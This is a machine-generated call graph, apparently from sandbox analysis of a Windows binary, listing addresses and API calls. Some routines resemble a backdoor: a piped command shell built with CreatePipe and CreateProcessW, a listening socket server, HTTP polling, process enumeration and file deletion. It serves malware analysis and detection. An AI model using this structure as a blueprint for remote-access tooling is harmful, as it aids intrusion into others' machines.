19833->19835 19836 412622 19834->19836 19837 40f937 35 API calls 19835->19837 19838 412658 41 API calls 19836->19838 19839 412650 19837->19839 19840 412630 19838->19840 19839->19824 19843 411f56 LeaveCriticalSection 19840->19843 19842 412638 19842->19824 19843->19842 19853 40de4f 19844->19853 19847 40ddbb GetCurrentProcess TerminateProcess 19850 40ddcc 19847->19850 19848 40de36 19856 40de58 19848->19856 19849 40de3d ExitProcess 19850->19848 19850->19849 19854 41257d ctype 29 API calls 19853->19854 19855 40ddb0 19854->19855 19855->19847 19855->19850 19859 4125de LeaveCriticalSection 19856->19859 19858 40dd95 19858->19278 19859->19858 19861 4032dc 19860->19861 19862 40356d 19860->19862 19861->19296 19863 420e3f ctype 29 API calls 19862->19863 19864 403577 GetAdaptersInfo 19863->19864 19864->19861 19866 40358f 19864->19866 19865 420e68 ctype 29 API calls 19865->19861 19866->19865 19868 40d63c 19867->19868 19873 411110 __aulldiv __aullrem ctype 19867->19873 19868->19321 19874 410fd3 19868->19874 19869 41182c 44 API calls 19869->19873 19870 411861 44 API calls 19870->19873 19871 411892 44 API calls 19871->19873 19872 415712 39 API calls 19872->19873 19873->19868 19873->19869 19873->19870 19873->19871 19873->19872 19875 41106d 19874->19875 19882 410fe9 19874->19882 19875->19321 19876 411044 19877 4110b5 19876->19877 19878 41104e 19876->19878 19879 4125f3 44 API calls 19877->19879 19880 411075 19878->19880 19881 411065 19878->19881 19879->19875 19880->19875 19886 4127e3 19880->19886 19884 4125f3 44 API calls 19881->19884 19882->19875 19882->19876 19883 4156a5 29 API calls 19882->19883 19883->19876 19884->19875 19887 412830 19886->19887 19888 4127f0 19886->19888 19889 40f92e 35 API calls 19887->19889 19888->19887 19890 41280b 19888->19890 19891 412835 19889->19891 19892 411ef7 31 API calls 19890->19892 19893 40f937 35 API calls 19891->19893 19894 412812 19892->19894 19895 412840 19893->19895 19896 412848 37 API calls 19894->19896 19895->19875 19897 412820 19896->19897 19900 411f56 LeaveCriticalSection 19897->19900 19899 412828 19899->19875 19900->19899 19902 402111 19901->19902 19903 402f29 19901->19903 19902->19363 19903->19902 19904 402f2e WaitForSingleObject ResetEvent SetEvent 19903->19904 19905 402f7f WaitForSingleObject 19904->19905 19906 402f91 Sleep 19905->19906 19907 402f97 SetEvent 19905->19907 19906->19905 19907->19902 20035 40dbe0 19908->20035 19911 403a50 CreateToolhelp32Snapshot 19913 403a74 19911->19913 19914 403a69 19911->19914 19912 403a47 19912->19411 19915 420e3f ctype 29 API calls 19913->19915 19914->19411 19916 403a96 Process32FirstW 19915->19916 19917 403af4 19916->19917 19918 403c4e 19916->19918 19920 403b05 Process32NextW 19917->19920 19919 402f20 6 API calls 19918->19919 19921 403c58 19919->19921 19922 403c43 CloseHandle 19920->19922 19923 403b4e OpenProcess 19920->19923 19924 420e68 ctype 29 API calls 19921->19924 19922->19918 19925 403b67 EnumProcessModules 19923->19925 19929 403bb2 19923->19929 19926 403c5e 19924->19926 19927 403bc0 CloseHandle 19925->19927 19928 403b7d GetModuleFileNameExW 19925->19928 19926->19411 19927->19929 19928->19929 19929->19927 19930 403c19 Process32NextW 19929->19930 19930->19922 19930->19923 19932 40d813 InterlockedIncrement 19931->19932 19948 40d7e9 19931->19948 19933 40d827 InterlockedDecrement 19932->19933 19935 40d835 19932->19935 19934 41257d ctype 29 API calls 19933->19934 19934->19935 19936 40d888 19935->19936 19937 40d84b 19935->19937 20038 412330 19936->20038 19938 40d850 19937->19938 19939 40d85a InterlockedDecrement 19937->19939 20037 4125de LeaveCriticalSection 19938->20037 19939->19948 19943 40d8cd ctype 19944 40d8f2 InterlockedDecrement 19943->19944 19945 40d8e8 19943->19945 19950 40d8ef 19944->19950 20056 4125de LeaveCriticalSection 19945->20056 19946 40e10c ctype 29 API calls 19947 40d8ae 19946->19947 19947->19943 19952 412330 9 API calls 19947->19952 19948->19411 19951 40df0d ctype 29 API calls 19950->19951 19951->19948 19952->19943 20057 405ee6 19953->20057 19955 40371e GetCurrentDirectoryW SetCurrentDirectoryW 20058 405fab 19955->20058 19958 40376d SetCurrentDirectoryW 19959 4039be 19958->19959 19961 424739 ctype 32 API calls 19959->19961 19962 4039cf 19961->19962 19965 403779 19966 4037aa 19965->19966 20080 4061d1 19965->20080 20086 405f61 19966->20086 19990 4249a2 lstrlenW 19989->19990 19991 42499e 19989->19991 19990->19991 20172 42492e 19991->20172 19993 402849 DeleteFileW 19993->19395 19993->19409 19995 420e3f ctype 29 API calls 19994->19995 19996 403035 19995->19996 19997 40d7c2 66 API calls 19996->19997 19998 4030c1 19997->19998 19999 4030ca 19998->19999 20000 4030fe 19998->20000 20001 402f20 6 API calls 19999->20001 20002 40da67 40 API calls 20000->20002 20003 4030ea 20001->20003 20004 403107 20002->20004 20005 420e68 ctype 29 API calls 20003->20005 20182 40d92e 20004->20182 20007 4030f0 20005->20007 20007->19411 20016 402b7a SetEvent 20015->20016 20017 402b4e 20015->20017 20016->19411 20017->20016 20019 40d6f3 20018->20019 20020 40d776 20018->20020 20019->20020 20021 40d70e 20019->20021 20022 40f92e 35 API calls 20020->20022 20024 411ef7 31 API calls 20021->20024 20023 40d77b 20022->20023 20026 40f937 35 API calls 20023->20026 20025 40d716 20024->20025 20195 411f78 20025->20195 20032 402a54 20026->20032 20032->19422 20036 403a0a EnumProcesses 20035->20036 20036->19911 20036->19912 20037->19948 20039 412360 LCMapStringW 20038->20039 20040 41237c 20038->20040 20039->20040 20041 412384 LCMapStringA 20039->20041 20042 4123e2 20040->20042 20043 4123c5 LCMapStringA 20040->20043 20041->20040 20044 40d89f 20041->20044 20042->20044 20045 4123f8 MultiByteToWideChar 20042->20045 20043->20044 20044->19943 20044->19946 20045->20044 20046 412422 20045->20046 20046->20044 20047 412458 MultiByteToWideChar 20046->20047 20047->20044 20048 412471 LCMapStringW 20047->20048 20048->20044 20049 41248c 20048->20049 20050 412492 20049->20050 20052 4124d2 20049->20052 20050->20044 20051 4124a0 LCMapStringW 20050->20051 20051->20044 20052->20044 20053 41250a LCMapStringW 20052->20053 20053->20044 20054 412522 WideCharToMultiByte 20053->20054 20054->20044 20056->19950 20057->19955 20059 405f61 ctype 29 API calls 20058->20059 20060 405fb5 20059->20060 20061 420e3f ctype 29 API calls 20060->20061 20062 405fbf lstrcpyW FindFirstFileW 20061->20062 20064 405ff1 GetLastError 20062->20064 20065 406003 20062->20065 20066 405f61 ctype 29 API calls 20064->20066 20114 424a5f 20065->20114 20076 406000 SetLastError 20066->20076 20079 403769 20076->20079 20079->19958 20079->19965 20081 4061da 20080->20081 20082 4061de 20080->20082 20081->19965 20083 4061f5 FindNextFileW 20082->20083 20084 420e3f ctype 29 API calls 20082->20084 20083->19965 20087 405f71 20086->20087 20088 405f6b 20086->20088 20115 4249e6 34 API calls 20114->20115 20116 406016 20115->20116 20117 40e663 20116->20117 20118 40e674 20117->20118 20119 40e6fe 20117->20119 20118->20119 20121 40e67e 20118->20121 20138 41434d 20119->20138 20123 40e6a3 GetFullPathNameW 20121->20123 20125 40e10c ctype 29 API calls 20121->20125 20139 41257d ctype 29 API calls 20138->20139 20173 42493b 20172->20173 20174 424951 ctype 20172->20174 20173->20174 20178 4248ed 20173->20178 20174->19993 20176 424986 20177 42469e 32 API calls 20176->20177 20177->20174 20179 424901 20178->20179 20181 424907 ctype 20178->20181 20180 4245a1 ctype 31 API calls 20179->20180 20180->20181 20181->20176 20183 4119b1 30 API calls 20182->20183 20184 40d93a 20183->20184 20189 40d95d 20184->20189 20187 411a03 2 API calls 20192 40d94b 20189->20192 20194 40d981 ctype 20189->20194 20192->20187 20194->20192 20196 411eb5 35 API calls 20195->20196 20197 411f94 20196->20197 20198 411fa9 SetFilePointer 20197->20198 20199 411f9c 20197->20199 20201 411fc1 GetLastError 20198->20201 20202 40d722 20198->20202 20200 40f92e 35 API calls 20199->20200 20200->20202 20201->20202 20207 404a01 20206->20207 20215 4048fc 20206->20215 20208 404902 select 20209 404a15 closesocket 20208->20209 20208->20215 20210 40493f recv 20211 404a3f closesocket 20210->20211 20210->20215 20212 402f20 6 API calls 20211->20212 20213 404ab1 20212->20213 20214 402f20 6 API calls 20214->20215 20215->20207 20215->20208 20215->20209 20215->20210 20215->20211 20215->20214 20217 40dbe0 20216->20217 20218 403dba CreatePipe CreatePipe CreateProcessW Sleep 20217->20218 20219 420e3f ctype 29 API calls 20218->20219 20227 403eaf 20219->20227 20220 403ed6 Sleep PeekNamedPipe 20222 403f06 ReadFile 20220->20222 20220->20227 20221 4040d7 WriteFile 20223 420e68 ctype 29 API calls 20221->20223 20224 420e3f ctype 29 API calls 20222->20224 20225 404101 20223->20225 20224->20227 20226 420e3f ctype 29 API calls 20226->20227 20227->20220 20227->20221 20227->20226 20228 40405b Sleep 20227->20228 20229 404074 WriteFile 20227->20229 20230 404122 20227->20230 20231 420e68 29 API calls ctype 20227->20231 20232 402f20 6 API calls 20227->20232 20228->20227 20229->20227 20229->20230 20233 420e68 ctype 29 API calls 20230->20233 20231->20227 20232->20227 20234 40412e 20233->20234 20236 40dbe0 20235->20236 20237 404ada WSAStartup 20236->20237 20238 404b0b 20237->20238 20239 404b1e htons htons socket 20237->20239 20240 404b66 20239->20240 20241 404b79 bind 20239->20241 20242 404b8c 20241->20242 20243 404b9f listen 20241->20243 20244 404baf 20243->20244 20257 404bc2 20243->20257 20245 404ddc 20246 404bce select 20247 404def closesocket 20246->20247 20246->20257 20248 404c08 accept 20249 404e0f closesocket 20248->20249 20248->20257 20250 402f20 6 API calls 20249->20250 20251 404e71 20250->20251 20252 404c41 select 20253 404c75 closesocket closesocket 20252->20253 20252->20257 20254 404c9b recv 20253->20254 20255 404d61 closesocket closesocket 20254->20255 20254->20257 20256 402f20 6 API calls 20255->20256 20256->20257 20257->20245 20257->20246 20257->20247 20257->20248 20257->20252 20257->20253 20257->20254 20257->20255 20258 402f20 6 API calls 20257->20258 20258->20257 20260 403c8c Sleep 20259->20260 20261 403d20 50 API calls 20260->20261 20262 403c98 20261->20262 20262->20260 20263 403ca7 20262->20263 20263->20260 20264 402f20 6 API calls 20263->20264 20264->20263 20266 4041a3 20265->20266 20267 4041ac Sleep 20266->20267 20268 40421e WaitForSingleObject ResetEvent 20266->20268 20274 4041a1 20266->20274 20267->20266 20269 404285 20268->20269 20270 40424f SetEvent Sleep 20268->20270 20271 404299 CreateFileW 20269->20271 20270->20266 20272 4042c8 CreateFileW 20271->20272 20273 4043a9 GetFileSize 20271->20273 20272->20273 20272->20274 20273->20274 20274->20266 20275 420e3f ctype 29 API calls 20274->20275 20276 4043ce SetFilePointer ReadFile CloseHandle 20274->20276 20277 402f20 6 API calls 20274->20277 20278 404393 SetEvent Sleep 20274->20278 20279 4044ae SetEvent 20274->20279 20280 420e68 ctype 29 API calls 20274->20280 20281 402f20 6 API calls 20274->20281 20275->20274 20276->20274 20277->20274 20278->20274 20279->20274 20280->20274 20282 40456b Sleep 20281->20282 20282->20274 20284 401137 Sleep 20283->20284 20284->20284 20286 402c0b InternetOpenA 20285->20286 20287 402c30 InternetConnectA 20286->20287 20288 402c27 Sleep 20286->20288 20289 402c4d InternetCloseHandle Sleep 20287->20289 20290 402c5e HttpOpenRequestA 20287->20290 20288->20286 20289->20286 20291 402c81 InternetCloseHandle InternetCloseHandle Sleep 20290->20291 20292 402c9e InternetSetOptionA ResetEvent 20290->20292 20291->20286 20293 402cc1 WaitForSingleObject WaitForSingleObject ResetEvent 20292->20293 20294 402d03 20293->20294 20295 402cf5 SetEvent 20293->20295 20296 402d0c SetEvent 20294->20296 20297 40d60e 48 API calls 20294->20297 20295->20293 20296->20293 20298 402d6f HttpAddRequestHeadersA 20297->20298 20299 402db2 20298->20299 20300 40d60e 48 API calls 20299->20300 20301 420e3f ctype 29 API calls 20299->20301 20308 420e68 ctype 29 API calls 20299->20308 20302 402e71 HttpAddRequestHeadersA HttpSendRequestA 20300->20302 20301->20299 20303 402eba InternetReadFile 20302->20303 20304 402eea GetLastError 20303->20304 20305 402ede 20303->20305 20304->20305 20305->20303 20306 401ff0 186 API calls 20305->20306 20307 402efb SetEvent ResetEvent 20306->20307 20307->20293 20308->20299 20309 420932 KiUserCallbackDispatcher 20310 420949 20309->20310 20311 42096c 20309->20311 20310->20311 20312 42095e TranslateMessage DispatchMessageW 20310->20312 20312->20311 20313 421ce2 20314 421cf3 20313->20314 20315 421cee 20313->20315 20316 421c5c 57 API calls 20314->20316 20317 421cfb 20316->20317 20318 421a74 98 API calls 20317->20318 20318->20315 20319 421ef2 20320 428c05 ctype 21 API calls 20319->20320 20321 421f08 20320->20321 20322 421f13 CallNextHookEx 20321->20322 20323 421f2a 20321->20323 20324 421fd9 20322->20324 20325 4283ee ctype 28 API calls 20323->20325 20326 421f3c 20325->20326 20327 421fe2 20326->20327 20328 421f4e 20326->20328 20348 421c7a 20327->20348 20330 421fb5 CallNextHookEx 20328->20330 20332 421f5b GetWindowLongW 20328->20332 20330->20324 20331 421fcc UnhookWindowsHookEx 20330->20331 20331->20324 20332->20330 20333 421f6b GetPropW 20332->20333 20333->20330 20334 421f7c SetPropW GetPropW 20333->20334 20334->20330 20335 421f94 GlobalAddAtomW 20334->20335 20336 421fa6 20335->20336 20337 421fab SetWindowLongW 20335->20337 20336->20337 20337->20330 20338 422077 20339 42207f SetWindowLongW 20338->20339 20341 42206b 20339->20341 20341->20330 20342 421a74 98 API calls 20343 42202d 20342->20343 20343->20338 20344 422034 20343->20344 20345 422039 GetWindowLongW 20344->20345 20346 422056 20345->20346 20346->20341 20347 42205a SetWindowLongW 20346->20347 20347->20341 20349 421c86 20348->20349 20350 421c8a 20348->20350 20349->20338 20349->20342 20351 421bc3 ctype 57 API calls 20350->20351 20352 421c92 20351->20352 20353 4200ce 29 API calls 20352->20353 20354 421ca0 20353->20354 20355 42443b GetParent 20354->20355 20355->20349 20356 4010a0 20367 40516a 20356->20367 20362 4010d7 20387 42131a 20362->20387 20368 405173 20367->20368 20369 405182 20367->20369 20370 428c9a ctype 7 API calls 20368->20370 20371 4283ee ctype 28 API calls 20369->20371 20370->20369 20372 4010c2 20371->20372 20373 427f56 20372->20373 20374 427f6a 20373->20374 20378 4010cc 20373->20378 20375 428c9a ctype 7 API calls 20374->20375 20376 427f79 20375->20376 20377 4283ee ctype 28 API calls 20376->20377 20379 427fc4 20376->20379 20377->20379 20381 4011c0 20378->20381 20379->20378 20380 4283ee ctype 28 API calls 20379->20380 20380->20378 20382 4011e9 20381->20382 20383 4283ee ctype 28 API calls 20382->20383 20384 4011fc 20383->20384 20385 4283ee ctype 28 API calls 20384->20385 20386 401201 LoadIconW 20385->20386 20386->20362 20388 421324 __EH_prolog 20387->20388 20389 4283ee ctype 28 API calls 20388->20389 20390 421340 20389->20390 20391 421367 20390->20391 20392 4283ee ctype 28 API calls 20390->20392 20393 421375 20391->20393 20394 42136b LockResource 20391->20394 20395 42134e FindResourceW LoadResource 20392->20395 20396 4010ef 20393->20396 20428 42129e 20393->20428 20394->20393 20395->20391 20422 420fed 20396->20422 20401 4213ba 20444 422096 20401->20444 20402 42139c IsWindowEnabled 20402->20401 20403 4213a9 EnableWindow 20402->20403 20403->20401 20406 421c35 58 API calls 20407 4213cb 20406->20407 20451 42102b 20407->20451 20410 421411 20411 421441 20410->20411 20412 421436 EnableWindow 20410->20412 20414 421446 GetActiveWindow 20411->20414 20415 42145a 20411->20415 20412->20411 20413 4213fb 20413->20410 20417 424319 SetWindowPos 20413->20417 20414->20415 20418 421451 SetActiveWindow 20414->20418 20503 4212d8 20415->20503 20416 424202 GetWindowLongW 20419 4213eb 20416->20419 20417->20410 20418->20415 20484 423c3c 20419->20484 20424 420ff7 __EH_prolog 20422->20424 20423 421013 20691 422256 20423->20691 20424->20423 20682 422413 20424->20682 20427 401100 20429 4283ee ctype 28 API calls 20428->20429 20430 4212a7 20429->20430 20432 4212b7 20430->20432 20531 42700d 20430->20531 20514 4271b3 20432->20514 20435 422096 23 API calls 20436 4212d3 20435->20436 20437 4220e2 20436->20437 20438 428c05 ctype 21 API calls 20437->20438 20439 4220f2 20438->20439 20440 4283ee ctype 28 API calls 20439->20440 20441 4220f9 20440->20441 20442 421392 20441->20442 20443 422106 UnhookWindowsHookEx 20441->20443 20442->20401 20442->20402 20443->20442 20445 428c05 ctype 21 API calls 20444->20445 20446 4220a7 20445->20446 20447 4213c3 20446->20447 20448 4220b8 GetCurrentThreadId SetWindowsHookExW 20446->20448 20447->20406 20448->20447 20449 4220d5 20448->20449 20450 41fa5f ctype RaiseException 20449->20450 20450->20447 20452 421035 __EH_prolog 20451->20452 20453 42104f 20452->20453 20454 4283ee ctype 28 API calls 20452->20454 20455 4283ee ctype 28 API calls 20453->20455 20454->20453 20456 42105a 20455->20456 20537 423e7e 20456->20537 20459 423e7e 40 API calls 20463 42107d 20459->20463 20460 421235 20460->20410 20460->20413 20460->20416 20462 4210d0 20464 4210e0 GetSystemMetrics 20462->20464 20472 4210f0 20462->20472 20463->20460 20592 42522d 20463->20592 20466 421175 20464->20466 20464->20472 20468 422096 23 API calls 20466->20468 20470 421183 CreateDialogIndirectParamW 20468->20470 20474 424739 ctype 32 API calls 20470->20474 20471 42114d 20610 42510b 20471->20610 20472->20466 20597 42507c 20472->20597 20479 4211b2 20474->20479 20477 421169 GlobalLock 20477->20466 20478 4220e2 29 API calls 20480 4211f9 20478->20480 20479->20478 20481 42121e 20480->20481 20482 421212 DestroyWindow 20480->20482 20481->20460 20483 421223 GlobalUnlock GlobalFree 20481->20483 20482->20481 20483->20460 20485 423c5e GetParent 20484->20485 20486 423c59 20484->20486 20489 4203c0 28 API calls 20485->20489 20487 424202 GetWindowLongW 20486->20487 20487->20485 20494 423c83 20489->20494 20490 423c94 PeekMessageW 20490->20494 20491 424368 ShowWindow 20493 423cb2 UpdateWindow 20491->20493 20492 423ce8 SendMessageW 20492->20494 20493->20494 20494->20490 20494->20491 20494->20492 20495 423cce SendMessageW 20494->20495 20496 423d7f 20494->20496 20498 423d85 20494->20498 20499 424368 ShowWindow 20494->20499 20501 4203c0 28 API calls 20494->20501 20502 423d6b PeekMessageW 20494->20502 20495->20494 20654 42ad92 20496->20654 20498->20413 20500 423d3a UpdateWindow 20499->20500 20500->20494 20501->20494 20502->20494 20504 4220e2 29 API calls 20503->20504 20505 4212e0 20504->20505 20658 421cb3 20505->20658 20508 4212f4 EnableWindow 20509 4212ff 20508->20509 20510 4283ee ctype 28 API calls 20509->20510 20511 421308 20510->20511 20512 421319 20511->20512 20513 42700d 28 API calls 20511->20513 20512->20396 20513->20512 20515 4271c7 20514->20515 20516 42722c GetWindowLongW 20514->20516 20534 42724f 20515->20534 20518 42723c GetParent 20516->20518 20529 4271d9 20516->20529 20519 4271d5 20518->20519 20519->20516 20519->20529 20520 4271e3 GetParent 20520->20520 20521 4271ec 20520->20521 20523 4271fd 20521->20523 20524 4271f4 GetLastActivePopup 20521->20524 20525 4212cb 20523->20525 20527 427209 IsWindowEnabled 20523->20527 20524->20523 20525->20435 20526 405110 28 API calls 20526->20519 20527->20525 20528 427214 20527->20528 20528->20525 20530 427218 EnableWindow 20528->20530 20529->20520 20529->20521 20530->20525 20532 405110 28 API calls 20531->20532 20533 427013 20532->20533 20533->20432 20535 4281c1 21 API calls 20534->20535 20536 4271cc 20535->20536 20536->20519 20536->20526 20538 4283ee ctype 28 API calls 20537->20538 20539 423e89 ctype 20538->20539 20540 4283ee ctype 28 API calls 20539->20540 20588 421073 20539->20588 20541 423ec1 20540->20541 20542 423ef2 20541->20542 20613 42271f 20541->20613 20544 423f13 20542->20544 20545 42271f 32 API calls 20542->20545 20546 423f3a 20544->20546 20547 42271f 32 API calls 20544->20547 20545->20544 20548 423f60 20546->20548 20626 423dc6 20546->20626 20547->20546 20549 423f8d 20548->20549 20551 423dc6 34 API calls 20548->20551 20552 423fb6 20549->20552 20553 423f99 20549->20553 20551->20549 20555 423fd0 20552->20555 20556 423fae 20552->20556 20633 423e07 GetModuleHandleA LoadLibraryA 20553->20633 20557 423fce 20555->20557 20558 423fed 20555->20558 20556->20552 20559 423e07 6 API calls 20556->20559 20557->20555 20560 423e07 6 API calls 20557->20560 20561 424006 20558->20561 20562 423feb 20558->20562 20559->20557 20560->20562 20564 424023 20561->20564 20565 424004 20561->20565 20562->20558 20563 423e07 6 API calls 20562->20563 20563->20565 20567 424040 20564->20567 20568 424021 20564->20568 20565->20561 20566 423e07 6 API calls 20565->20566 20566->20568 20569 42403e 20567->20569 20570 42405d 20567->20570 20568->20564 20571 423e07 6 API calls 20568->20571 20569->20567 20572 423e07 6 API calls 20569->20572 20573 42405b 20570->20573 20574 42407a 20570->20574 20571->20569 20572->20573 20573->20570 20575 423e07 6 API calls 20573->20575 20576 424097 20574->20576 20577 424078 20574->20577 20575->20577 20579 4240b0 20576->20579 20580 424095 20576->20580 20577->20574 20578 423e07 6 API calls 20577->20578 20578->20580 20581 4240ae 20579->20581 20582 4240c9 20579->20582 20580->20576 20583 423e07 6 API calls 20580->20583 20581->20579 20584 423e07 6 API calls 20581->20584 20585 4240c7 20582->20585 20586 4240e6 20582->20586 20583->20581 20584->20585 20585->20582 20587 423e07 6 API calls 20585->20587 20586->20588 20589 4240e4 20586->20589 20587->20589 20588->20459 20589->20586 20590 423e07 6 API calls 20589->20590 20591 424101 20590->20591 20591->20588 20594 42523a 20592->20594 20593 425245 20593->20462 20594->20593 20595 424886 ctype 35 API calls 20594->20595 20596 425277 20595->20596 20596->20462 20598 425094 20597->20598 20599 42113e 20597->20599 20642 4250ab GlobalAlloc 20598->20642 20601 42538c GetStockObject 20599->20601 20602 4253b6 GetObjectW 20601->20602 20603 4253ae GetStockObject 20601->20603 20604 4253c7 GetDC 20602->20604 20607 425400 20602->20607 20603->20602 20603->20607 20605 4253e0 GetDeviceCaps MulDiv ReleaseDC 20604->20605 20606 4253db 20604->20606 20605->20607 20606->20605 20647 42527c 20607->20647 20611 425111 GlobalFree 20610->20611 20612 421164 20610->20612 20611->20612 20612->20466 20612->20477 20641 40dec0 20613->20641 20615 422729 GetClassInfoW 20616 422749 RegisterClassW 20615->20616 20617 422755 20615->20617 20616->20617 20618 422759 20616->20618 20617->20542 20619 4283ee ctype 28 API calls 20618->20619 20620 42275e 20619->20620 20620->20617 20621 428f39 ctype 6 API calls 20620->20621 20622 42276c 20621->20622 20623 4283ee ctype 28 API calls 20622->20623 20624 422774 lstrcatW lstrcatW 20623->20624 20625 428fa9 ctype LeaveCriticalSection 20624->20625 20625->20617 20627 4283ee ctype 28 API calls 20626->20627 20628 423dd8 LoadIconW 20627->20628 20629 423df1 LoadIconW 20628->20629 20630 423dfc 20628->20630 20629->20630 20631 42271f 32 API calls 20630->20631 20632 423e02 20631->20632 20632->20548 20634 423e25 GetProcAddress 20633->20634 20635 423e78 20633->20635 20636 423e52 20634->20636 20637 423e37 20634->20637 20635->20556 20639 423e6f FreeLibrary 20636->20639 20640 423e64 #17 20636->20640 20638 423e48 #17 20637->20638 20637->20639 20638->20639 20639->20635 20640->20639 20641->20615 20643 425107 20642->20643 20644 4250c7 GlobalLock 20642->20644 20643->20599 20645 4250de ctype 20644->20645 20646 4250f0 GlobalUnlock 20645->20646 20646->20643 20648 425292 GlobalLock 20647->20648 20649 42528b 20647->20649 20650 4252b5 lstrlenW 20648->20650 20649->20471 20652 4252f4 ctype 20650->20652 20653 42536a GlobalUnlock 20652->20653 20653->20649 20655 4203c0 28 API calls 20654->20655 20656 42ad97 PostQuitMessage 20655->20656 20656->20498 20659 421cbe 20658->20659 20662 4212e7 IsWindow 20658->20662 20660 421bc3 ctype 57 API calls 20659->20660 20661 421cc5 20660->20661 20661->20662 20664 42011e 20661->20664 20662->20508 20662->20509 20665 420154 20664->20665 20666 420127 20664->20666 20665->20662 20666->20665 20668 420050 20666->20668 20669 420061 20668->20669 20670 420066 20668->20670 20672 41ffaf 20669->20672 20670->20665 20673 41ffbf 20672->20673 20674 41ffb9 20672->20674 20678 41ff11 20673->20678 20676 420e68 ctype 29 API calls 20674->20676 20676->20673 20679 41ff15 20678->20679 20680 41ff25 20678->20680 20679->20680 20681 420e68 ctype 29 API calls 20679->20681 20680->20670 20681->20679 20683 422420 20682->20683 20684 42241c 20682->20684 20685 421bc3 ctype 57 API calls 20683->20685 20684->20423 20686 422429 ctype 20685->20686 20687 422448 20686->20687 20688 42243d DestroyWindow 20686->20688 20689 42245a 20687->20689 20690 421cb3 ctype 57 API calls 20687->20690 20688->20687 20689->20423 20690->20689 20692 422260 __EH_prolog 20691->20692 20693 42229c ctype 20692->20693 20694 422413 ctype 58 API calls 20692->20694 20693->20427 20694->20693 20695 421e76 20696 428c9a ctype 7 API calls 20695->20696 20697 421e8a 20696->20697 20701 421ed4 20697->20701 20729 4237b3 20697->20729 20700 421ed8 20701->20700 20702 421d17 20701->20702 20737 40dec0 20702->20737 20704 421d21 GetPropW 20705 421e01 20704->20705 20706 421d54 20704->20706 20707 421c35 58 API calls 20705->20707 20708 421de0 20706->20708 20709 421d5d 20706->20709 20711 421e09 20707->20711 20710 421c35 58 API calls 20708->20710 20712 421d62 20709->20712 20713 421dbc SetWindowLongW RemovePropW GlobalFindAtomW GlobalDeleteAtom 20709->20713 20715 421de6 20710->20715 20716 421c35 58 API calls 20711->20716 20714 421e1f CallWindowProcW 20712->20714 20717 421d6d 20712->20717 20713->20714 20718 421da8 20714->20718 20738 4219fe 20715->20738 20720 421e11 20716->20720 20721 421c35 58 API calls 20717->20721 20718->20700 20752 42199d 20720->20752 20724 421d73 20721->20724 20726 421901 2 API calls 20724->20726 20725 421e1b 20725->20714 20725->20718 20727 421d83 CallWindowProcW 20726->20727 20728 421924 95 API calls 20727->20728 20728->20718 20730 423822 20729->20730 20731 4237bf 20729->20731 20730->20701 20731->20730 20732 4237e8 GetObjectW SetBkColor 20731->20732 20782 426950 20731->20782 20733 423813 SetTextColor 20732->20733 20734 42380b GetSysColor 20732->20734 20733->20730 20734->20733 20737->20704 20739 421a08 20738->20739 20740 421a6d 20738->20740 20739->20740 20761 42309d 20739->20761 20740->20725 20742 421a2b 20742->20740 20743 421a2f GetLastActivePopup 20742->20743 20744 421c35 58 API calls 20743->20744 20745 421a3e 20744->20745 20745->20740 20746 421a44 GetForegroundWindow 20745->20746 20747 421c35 58 API calls 20746->20747 20748 421a50 20747->20748 20748->20740 20749 42438f IsWindowEnabled 20748->20749 20750 421a5b 20749->20750 20750->20740 20751 421a5f SetForegroundWindow 20750->20751 20751->20740 20753 424202 GetWindowLongW 20752->20753 20754 4219af 20753->20754 20755 4219f7 20754->20755 20756 42309d 62 API calls 20754->20756 20755->20725 20757 4219bd 20756->20757 20758 42309d 62 API calls 20757->20758 20759 4219c9 20758->20759 20759->20755 20760 4219e2 SendMessageW 20759->20760 20760->20755 20762 4230a8 20761->20762 20764 4230a1 20761->20764 20762->20742 20764->20762 20765 4230bd 20764->20765 20768 423058 20764->20768 20766 421c35 58 API calls 20765->20766 20767 4230c3 20766->20767 20767->20742 20769 421c5c 57 API calls 20768->20769 20770 423063 20769->20770 20771 423077 GetWindowLongW 20770->20771 20772 423067 20770->20772 20774 423090 GetWindow 20771->20774 20775 423087 GetParent 20771->20775 20777 405c99 20772->20777 20776 42306e 20774->20776 20775->20776 20776->20764 20778 405ca0 GetParent 20777->20778 20779 405ca9 20777->20779 20778->20779 20780 421c35 58 API calls 20779->20780 20781 405caf 20780->20781 20781->20776 20783 4237e4 20782->20783 20784 42695c GetWindowLongW 20782->20784 20783->20730 20783->20732 20784->20783 20785 426973 GetClassNameW lstrcmpiW 20784->20785 20785->20783 20786 428fca 20791 428fd4 20786->20791 20788 428fcf 20799 40d1f7 20788->20799 20792 429046 GetVersion 20791->20792 20793 429087 GetProcessVersion 20792->20793 20794 429099 20792->20794 20793->20794 20802 424d98 KiUserCallbackDispatcher GetSystemMetrics 20794->20802 20796 4290a0 20809 424d54 7 API calls 20796->20809 20798 4290aa LoadCursorW LoadCursorW 20798->20788 20814 40d179 20799->20814 20803 424db7 20802->20803 20804 424dbe 20802->20804 20810 428ff4 20803->20810 20813 429024 GetSystemMetrics GetSystemMetrics 20804->20813 20808 424dc3 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 20808->20796 20809->20798 20811 424dbc 20810->20811 20812 428ffd GetSystemMetrics GetSystemMetrics 20810->20812 20811->20808 20812->20811 20813->20808 20815 40de4f 29 API calls 20814->20815 20816 40d17f 20815->20816 20825 40ed55 20816->20825 20819 40ed55 30 API calls 20820 40d1a8 20819->20820 20837 40f130 20820->20837 20821 40de58 LeaveCriticalSection 20823 40d1f3 20821->20823 20824 40d1b7 20824->20821 20826 40ed82 20825->20826 20827 40edc8 20825->20827 20828 41257d ctype 29 API calls 20826->20828 20829 40ee13 HeapSize 20827->20829 20831 41257d ctype 29 API calls 20827->20831 20832 40ed89 ctype 20828->20832 20830 40d18a 20829->20830 20830->20819 20830->20824 20833 40edd4 ctype 20831->20833 20862 40edbf 20832->20862 20865 40ee3a 20833->20865 20836 40edb6 20836->20829 20836->20830 20838 40f16a 20837->20838 20839 40f15c 20837->20839 20841 40f171 20838->20841 20842 40f17d 20838->20842 20840 40e10c ctype 29 API calls 20839->20840 20843 40f164 20840->20843 20844 40df0d ctype 29 API calls 20841->20844 20845 40f2c4 20842->20845 20859 40f18b ctype 20842->20859 20843->20824 20844->20843 20846 40f414 ctype 20845->20846 20860 40f2cd ctype 20845->20860 20846->20843 20848 40f422 HeapReAlloc 20846->20848 20847 41257d ctype 29 API calls 20847->20859 20848->20846 20849 41257d ctype 29 API calls 20849->20860 20851 40f3c7 HeapReAlloc 20851->20860 20852 40f217 HeapAlloc 20852->20859 20854 40f26d HeapReAlloc 20854->20859 20855 40f387 HeapAlloc 